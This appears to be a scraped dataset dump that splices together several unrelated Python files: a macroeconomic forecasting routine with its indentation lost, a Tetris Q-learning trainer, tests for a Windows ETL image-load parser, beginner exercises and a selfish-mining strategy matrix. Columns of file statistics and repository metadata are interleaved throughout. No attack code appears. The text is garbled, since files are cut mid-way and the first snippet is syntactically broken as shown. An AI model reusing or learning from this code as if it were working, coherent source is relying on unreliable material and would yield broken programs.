# reinitializes currentDate to todays date, also typecasts it to a string so it can be read by MySQL
currentDate = str(datetime.today())
currentDate = ("'" + currentDate + "'")
# For loop to loop through the macroeconomic codes to calculate the macro economic variable percent change
for i in keys:
# Check to make sure the macroeconcode we are working with is one of the relevant ones
if i in vars:
# Query to grab the macroeconomic statistics from the database using the relevant macro economic codes
query = 'SELECT date, statistics, macroeconcode FROM dbo_macroeconstatistics WHERE macroeconcode = {}'.format('"' + keys[i] + '"')
data = pd.read_sql_query(query, self.engine)
# For loop to retrieve macro statistics and calculate percent change
for j in range(n):
# This will grab the n+1 statistic to use to calculate the percent change to the n statistic
temp = data.tail(n + 1)
# This will grab the most recent n statistics from the query, as we are working only with n points
data = data.tail(n)
# For the first iteration we need to use the n+1th statistic to calculate percent change on the oldest point
if j == 0:
macrov = (data['statistics'].iloc[j] - temp['statistics'].iloc[0]) / temp['statistics'].iloc[0]
vars[i].append(macrov)
else:
macrov = (data['statistics'].iloc[j] - data['statistics'].iloc[j - 1]) / \
data['statistics'].iloc[j - 1]
vars[i].append(macrov)
# We now iterate through the instrument ids
for x in ikeys:
# This query will grab the quarterly instrument statistics from 2014 to now
query = "SELECT date, close, instrumentid FROM ( SELECT date, close, instrumentid, ROW_NUMBER() OVER " \
"(PARTITION BY YEAR(date), MONTH(date) ORDER BY DAY(date) DESC) AS rowNum FROM " \
"dbo_instrumentstatistics WHERE instrumentid = {} AND date BETWEEN '2014-03-21' AND {} ) z " \
"WHERE rowNum = 1 AND ( MONTH(z.date) = 3 OR MONTH(z.date) = 6 OR MONTH(z.date) = 9 OR " \
"MONTH(z.date) = 12)".format(3, currentDate)
# Then we execute the query and store the returned values in instrumentStats, and grab the last n stats from the dataframe as we are only using n datapoints
instrumentStats = pd.read_sql_query(query, self.engine)
instrumentStats = instrumentStats.tail(n)
# Temp result will then store the resulting forecast prices throughout the calculation of n datapoints
temp_result = []
# isFirst will determine whether or not this is the first calculation being done
# If it is true then we use the most recent instrument statistic to forecast the first pricepoint
# IF it is false then we use the previous forecast price to predict the next forecast price
isFirst = True
# This for loop is where the actual calculation takes place
for i in range(n):
if isFirst:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] * weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
stat = (stat * instrumentStats['close'].iloc[n-1]) + instrumentStats['close'].iloc[n-1]
temp_result.append(stat)
temp_price = stat
isFirst = False
else:
stat = vars['GDP'][i] * weightings[ikeys[x]][0] - (vars['Unemployment Rate'][i] * weightings[ikeys[x]][1] + vars['Inflation Rate'][i] *
weightings[ikeys[x]][2]) - (vars['Misery Index'][i] * vars['Misery Index'][i])
stat = (stat * temp_price) + temp_price
temp_result.append(stat)
temp_price = stat
# We then append the resulting forcasted prices over n quarters to result, a dictionary where each
# Instrument ID is mapped to n forecast prices
result[ikeys[x]].append(temp_result)
#Table will represent a temporary table with the data appended matching the columns of the macroeconalgorithmforecast database table
table = []
#This forloop will populate table[] with the correct values according to the database structure
for i, k in result.items():
cnt = 0
for j in k:
for l in range(n):
table.append([date[cnt], i, 'ALL', j[cnt], 'MSF2 Past Dates', 0])
cnt += 1
#Once table is populated we then push it into the macroeconalgorithmforecast table
table = pd.DataFrame(table, columns=['forecastdate','instrumentid' , 'macroeconcode',
'forecastprice', 'algorithmcode', 'prederror'])
table.to_sql('dbo_macroeconalgorithmforecast', self.engine, if_exists=('append'), index=False)
# Calculation function used in MSF1
def calc(self, df1, df2, n):
G = 0
# Calculates average Macro Variable % change over past n days
for i in range(n):
G = df1['statistics'][i] + G
G = G / n
G = G / 100
return G
# END CODE MODULE
| 51.762414
| 234
| 0.57503
| 9,699
| 82,354
| 4.798948
| 0.068976
| 0.02041
| 0.009668
| 0.015039
| 0.849221
| 0.830895
| 0.817703
| 0.803115
| 0.801568
| 0.790848
| 0
| 0.01405
| 0.330221
| 82,354
| 1,591
| 235
| 51.762414
| 0.829783
| 0.292238
| 0
| 0.772222
| 0
| 0.01
| 0.183004
| 0.022424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014444
| false
| 0
| 0.018889
| 0
| 0.035556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
822b4480fa64608eb6e4ce27156b3eb30481ac3a
| 15,690
|
py
|
Python
|
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
src/train/train_q_function2_visual.py
|
msHujindou/Tetris-DQN
|
8d8f83b151262dd2c392f8d247b1cee76c0bf0fd
|
[
"MIT"
] | null | null | null |
"""
此脚本是为了检验train_q_function2.py总结的原因
总结原因:
4x10 仅有L型俄罗斯方块,的的确确存在数种无限循环,但每次所有方块都消除完后,
总会回归到那个初始状态,但消除行数的reward机制会促使避开无限循环
"""
import numpy as np
import cv2
from utils.util import create_image_from_state
from game.confs import Action_Type, Block_Type
from game.tetris_engine import tetris_engine
action_list = []
state_init_value = -10000.0
def sample():
act_list = [
1,
1,
3,
3,
3,
2,
2,
1,
1,
1,
3,
3,
0,
0,
0,
0,
3,
2,
2,
0,
0,
0,
3,
3,
2,
3,
3,
3,
3,
2,
2,
2,
3,
3,
3,
3,
1,
1,
3,
3,
3,
2,
2,
1,
1,
1,
3,
3,
0,
0,
0,
0,
3,
2,
2,
0,
0,
0,
3,
3,
]
act_list_not_finite = [
0,
0,
0,
0,
3,
0,
3,
3,
3,
3,
1,
1,
3,
3,
3,
2,
2,
1,
1,
1,
3,
3,
0,
0,
0,
0,
0,
3,
3,
3,
1,
1,
3,
3,
2,
2,
1,
1,
1,
3,
0,
0,
2,
0,
3,
3,
3,
1,
1,
]
lr = 0.8
gamma = 0.95
qtable = {}
env = tetris_engine([Block_Type.L])
game_state = env.reset()
debug_img = None
is_end = False
tmplist = act_list.copy()
itr_count = 0
while True:
img = create_image_from_state(game_state)
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
cv2.imshow("frame", img)
if debug_img is not None:
cv2.imshow("debug", debug_img)
if len(tmplist) <= 0:
itr_count += 1
if itr_count % 2 == 0:
tmplist = act_list.copy()
else:
tmplist = act_list_not_finite.copy()
key = cv2.waitKey(1)
# press Q or ESC
if key == ord("q") or key == 27:
break
if key != ord("i"):
tmpkey = tmplist.pop(0)
if tmpkey == 0:
key = ord("a")
elif tmpkey == 1:
key = ord("d")
elif tmpkey == 2:
key = ord("w")
elif tmpkey == 3:
key = ord("s")
else:
raise Exception("Key Error ...")
if is_end:
env = tetris_engine([Block_Type.L])
game_state = env.reset()
debug_img = None
is_end = False
if itr_count % 2 == 0:
tmplist = act_list.copy()
else:
tmplist = act_list_not_finite.copy()
continue
game_state_key = game_state.tobytes().hex()
if game_state_key not in qtable:
qtable[game_state_key] = [state_init_value] * env.action_space
if key == ord("w"):
# rotate
new_state, reward, is_end, debug = env.step(Action_Type.Rotate)
new_state_key = new_state.tobytes().hex()
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
qtable[game_state_key][2] = qtable[game_state_key][2] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][2]
)
# print(np.array(list(qtable.values())))
game_state = new_state
elif key == ord("s"):
# down
new_state, reward, is_end, debug = env.step(Action_Type.Down)
new_state_key = new_state.tobytes().hex()
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if is_end:
qtable[game_state_key][3] = -100
else:
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
qtable[game_state_key][3] = qtable[game_state_key][3] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][3]
)
# print(np.array(list(qtable.values())))
game_state = new_state
elif key == ord("a"):
# left
new_state, reward, is_end, debug = env.step(Action_Type.Left_Down)
new_state_key = new_state.tobytes().hex()
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
qtable[game_state_key][0] = qtable[game_state_key][0] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][0]
)
# print(np.array(list(qtable.values())))
game_state = new_state
elif key == ord("d"):
# right
new_state, reward, is_end, debug = env.step(Action_Type.Right_Down)
new_state_key = new_state.tobytes().hex()
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
qtable[game_state_key][1] = qtable[game_state_key][1] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][1]
)
# print(np.array(list(qtable.values())))
game_state = new_state
elif key == ord(" "):
# bottom
game_state, reward, is_end, debug = env.step(Action_Type.Bottom)
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
elif key == ord("i"):
print("#### iteration count is", itr_count)
print(np.array(list(qtable.values())))
cv2.destroyAllWindows()
def visual_train():
lr = 0.8
gamma = 0.95
qtable = {}
env = tetris_engine([Block_Type.L])
game_state = env.reset()
debug_img = None
is_end = False
while True:
img = create_image_from_state(game_state)
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
cv2.imshow("frame", img)
if debug_img is not None:
cv2.imshow("debug", debug_img)
key = cv2.waitKey(20)
# press Q or ESC
if key == ord("q") or key == 27:
break
if is_end:
env = tetris_engine([Block_Type.L])
game_state = env.reset()
debug_img = None
is_end = False
continue
game_state_key = game_state.tobytes().hex()
if game_state_key not in qtable:
qtable[game_state_key] = [state_init_value] * env.action_space
if key == ord("w"):
# rotate
new_state, reward, is_end, debug = env.step(Action_Type.Rotate)
new_state_key = new_state.tobytes().hex()
print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
print(
reward,
qtable[game_state_key][2]
+ lr
* (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][2]
),
)
qtable[game_state_key][2] = qtable[game_state_key][2] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][2]
)
# print(np.array(list(qtable.values())))
action_list.append(2)
game_state = new_state
# print(game_state)
elif key == ord("s"):
# down
new_state, reward, is_end, debug = env.step(Action_Type.Down)
new_state_key = new_state.tobytes().hex()
print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
if not is_end:
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
print(
reward,
qtable[game_state_key][3]
+ lr
* (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][3]
),
)
qtable[game_state_key][3] = qtable[game_state_key][3] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][3]
)
# print(np.array(list(qtable.values())))
action_list.append(3)
game_state = new_state
# print(game_state)
elif key == ord("a"):
# left
new_state, reward, is_end, debug = env.step(Action_Type.Left_Down)
new_state_key = new_state.tobytes().hex()
print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
print(
reward,
qtable[game_state_key][0]
+ lr
* (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][0]
),
)
qtable[game_state_key][0] = qtable[game_state_key][0] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][0]
)
else:
print("not allowed operation", reward)
# print(np.array(list(qtable.values())))
action_list.append(0)
game_state = new_state
elif key == ord("d"):
# right
new_state, reward, is_end, debug = env.step(Action_Type.Right_Down)
new_state_key = new_state.tobytes().hex()
print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
# Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
if new_state_key not in qtable:
qtable[new_state_key] = [state_init_value] * env.action_space
# 对于无效的移动,不更新其Q value会使生成的Q table更健壮
if new_state_key != game_state_key:
print(
reward,
qtable[game_state_key][1]
+ lr
* (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][1]
),
)
qtable[game_state_key][1] = qtable[game_state_key][1] + lr * (
reward
+ gamma * np.amax(qtable[new_state_key])
- qtable[game_state_key][1]
)
# print(np.array(list(qtable.values())))
action_list.append(1)
game_state = new_state
elif key == ord(" "):
# bottom
game_state, reward, is_end, debug = env.step(Action_Type.Bottom)
# print(f"reward [{reward}], is_end [{is_end}]")
if debug is not None:
debug_img = create_image_from_state(debug)
debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
print(action_list)
action_list.clear()
elif key == ord("i"):
print(np.array(list(qtable.values())))
cv2.destroyAllWindows()
if __name__ == "__main__":
visual_train()
#sample()
| 33.961039
| 83
| 0.454175
| 1,794
| 15,690
| 3.722408
| 0.069677
| 0.109015
| 0.084456
| 0.09434
| 0.900719
| 0.891884
| 0.890836
| 0.890087
| 0.874513
| 0.860737
| 0
| 0.026535
| 0.440344
| 15,690
| 461
| 84
| 34.034707
| 0.733971
| 0.108923
| 0
| 0.85347
| 0
| 0
| 0.018418
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005141
| false
| 0
| 0.012853
| 0
| 0.017995
| 0.033419
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
415f9471dc00a3af92c72c628164a43c5e20ab27
| 82
|
py
|
Python
|
src/chapter24/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter24/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter24/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter24/chapter24note.py
# python3 src/chapter24/chapter24note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4171b316e1944fa2e2b2f4752060fd53f230c3a1
| 2,439
|
py
|
Python
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
import unittest
from etl.parsers.kernel.core import build_mof
from etl.parsers.kernel.image import ImageLoad
from etl.wmi import EventTraceGroup
class TestMofImageParser(unittest.TestCase):
def test_image_load_type2(self):
"""
Test Parsing image load event when type is 2
"""
payload = b'\x00\x00\xdc\x81\xfe\x7f\x00\x00\x00`\x02\x00\x00\x00\x00\x00\xcc\x01\x00\x00c\xf7\x02\x00\x00\x00\x00\x00\x0c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x004\x00\\\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00g\x00d\x00i\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00'
mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 2, payload)
self.assertIsInstance(mof, ImageLoad)
def test_image_load_type3(self):
"""
Test Parsing image load event when type is 3
"""
payload = b'\x00\x00`m\x03\xf8\xff\xff\x00`\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x05\x98\x00\x90\xa7iB\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00\\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00n\x00t\x00o\x00s\x00k\x00r\x00n\x00l\x00.\x00e\x00x\x00e\x00\x00\x00'
mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 3, payload)
self.assertIsInstance(mof, ImageLoad)
self.assertEqual(mof.get_image_filename(), '\\SystemRoot\\system32\\ntoskrnl.exe')
def test_image_load_type4(self):
"""
Test Parsing image load event when type is 4
"""
payload = b'\x00\x00`m\x03\xf8\xff\xff\x00`\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x05\x98\x00\x90\xa7iB\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00\\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00n\x00t\x00o\x00s\x00k\x00r\x00n\x00l\x00.\x00e\x00x\x00e\x00\x00\x00'
mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 4, payload)
self.assertIsInstance(mof, ImageLoad)
self.assertEqual(mof.get_image_filename(), '\\SystemRoot\\system32\\ntoskrnl.exe')
| 67.75
| 502
| 0.711357
| 425
| 2,439
| 4.021176
| 0.209412
| 0.386191
| 0.505559
| 0.59684
| 0.737858
| 0.715038
| 0.692218
| 0.692218
| 0.692218
| 0.623757
| 0
| 0.257394
| 0.112751
| 2,439
| 35
| 503
| 69.685714
| 0.532348
| 0.064371
| 0
| 0.368421
| 0
| 0.157895
| 0.598101
| 0.598101
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.157895
| false
| 0
| 0.210526
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41870690877ca954f30710a758cdb0b58b2c9c98
| 284
|
py
|
Python
|
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | 1
|
2020-04-02T08:54:36.000Z
|
2020-04-02T08:54:36.000Z
|
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | null | null | null |
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | null | null | null |
from math import trunc
num = float (input("Digite um valor-"))
print ("O valor digitado foi {:.0f} e a sua porção inteira é {}".format(num, trunc(num)))
'''num = float(input("Digite um valor- "))
print ("O valor digitado foi {} e a sua porção inteira é {}".format (num, int(num)))'''
| 47.333333
| 89
| 0.658451
| 47
| 284
| 3.978723
| 0.489362
| 0.085562
| 0.139037
| 0.203209
| 0.812834
| 0.812834
| 0.812834
| 0.812834
| 0.513369
| 0.513369
| 0
| 0.004184
| 0.158451
| 284
| 6
| 90
| 47.333333
| 0.778243
| 0
| 0
| 0
| 0
| 0
| 0.458065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
419dd030eac6f221d9dcb06ed503b4cda641f0e4
| 439
|
py
|
Python
|
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
# x = 0x0a
# y = 0x02
# z = x & y
# print(f'Hex: x = {x:02X}, y = {y:02X}, z = {z:02X}')
# print(f'Bin: x = {x:08b}, y = {y:08b}, z = {z:08b}')
x = 0x0a
y = 0x05
z = x ^ y
print(f'Hex: x = {x:02X}, y = {y:02X}, z = {z:02X}')
print(f'Bin: x = {x:08b}, y = {y:08b}, z = {z:08b}')
# x = 0x0a
# y = 0x02
# z = x | y
# print(f'Hex: x = {x:02X}, y = {y:02X}, z = {z:02X}')
# print(f'Bin: x = {x:08b}, y = {y:08b}, z = {z:08b}')
| 25.823529
| 55
| 0.416856
| 93
| 439
| 1.967742
| 0.129032
| 0.196721
| 0.098361
| 0.131148
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0
| 0.159875
| 0.273349
| 439
| 17
| 56
| 25.823529
| 0.413793
| 0.6082
| 0
| 0
| 0
| 0.4
| 0.575342
| 0
| 0
| 0
| 0.054795
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68bec5f62665ea179108d683571a7b699a736f26
| 1,902
|
py
|
Python
|
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1
|
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
selfish_mining_strategy = \
[
[ # irrelevant
['*', '*', '*', '*', '*', '*', '*', '*', '*', '*'],
['w', '*', 'a', '*', '*', '*', '*', '*', '*', '*'],
['w', 'w', '*', 'a', '*', '*', '*', '*', '*', '*'],
['w', 'w', 'w', '*', 'a', '*', '*', '*', '*', '*'],
['w', 'w', 'w', 'w', '*', 'a', '*', '*', '*', '*'],
['w', 'w', 'w', 'w', 'w', '*', 'a', '*', '*', '*'],
['w', 'w', 'w', 'w', 'w', 'w', '*', 'a', '*', '*'],
['w', 'w', 'w', 'w', 'w', 'w', 'w', '*', 'a', '*'],
['w', 'w', 'w', 'w', 'w', 'w', 'w', 'w', '*', 'a'],
['w', 'w', 'w', 'w', 'w', 'w', 'w', 'w', 'w', '*']
],
[ # relevant
['*', 'a', '*', '*', '*', '*', '*', '*', '*', '*'],
['*', 'm', 'a', '*', '*', '*', '*', '*', '*', '*'],
['*', 'o', 'm', 'a', '*', '*', '*', '*', '*', '*'],
['*', 'w', 'o', 'm', 'a', '*', '*', '*', '*', '*'],
['*', 'w', 'w', 'o', 'm', 'a', '*', '*', '*', '*'],
['*', 'w', 'w', 'w', 'o', 'm', 'a', '*', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'o', 'm', 'a', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'w', 'o', 'm', 'a', '*'],
['*', 'w', 'w', 'w', 'w', 'w', 'w', 'o', 'm', 'a'],
['*', 'w', 'w', 'w', 'w', 'w', 'w', 'w', 'o', 'm']
],
[ # match
['*', '*', '*', '*', '*', '*', '*', '*', '*', '*'],
['*', '*', '*', '*', '*', '*', '*', '*', '*', '*'],
['*', 'w', '*', '*', '*', '*', '*', '*', '*', '*'],
['*', 'w', 'w', '*', '*', '*', '*', '*', '*', '*'],
['*', 'w', 'w', 'w', '*', '*', '*', '*', '*', '*'],
['*', 'w', 'w', 'w', 'w', '*', '*', '*', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'w', '*', '*', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'w', 'w', '*', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'w', 'w', 'w', '*', '*'],
['*', 'w', 'w', 'w', 'w', 'w', 'w', 'w', 'w', '*']
]
]
| 47.55
| 59
| 0.099369
| 149
| 1,902
| 1.255034
| 0.067114
| 0.983957
| 1.235294
| 1.368984
| 0.721925
| 0.721925
| 0.684492
| 0.684492
| 0.620321
| 0.614973
| 0
| 0
| 0.307045
| 1,902
| 39
| 60
| 48.769231
| 0.141882
| 0.013144
| 0
| 0.128205
| 0
| 0
| 0.160171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
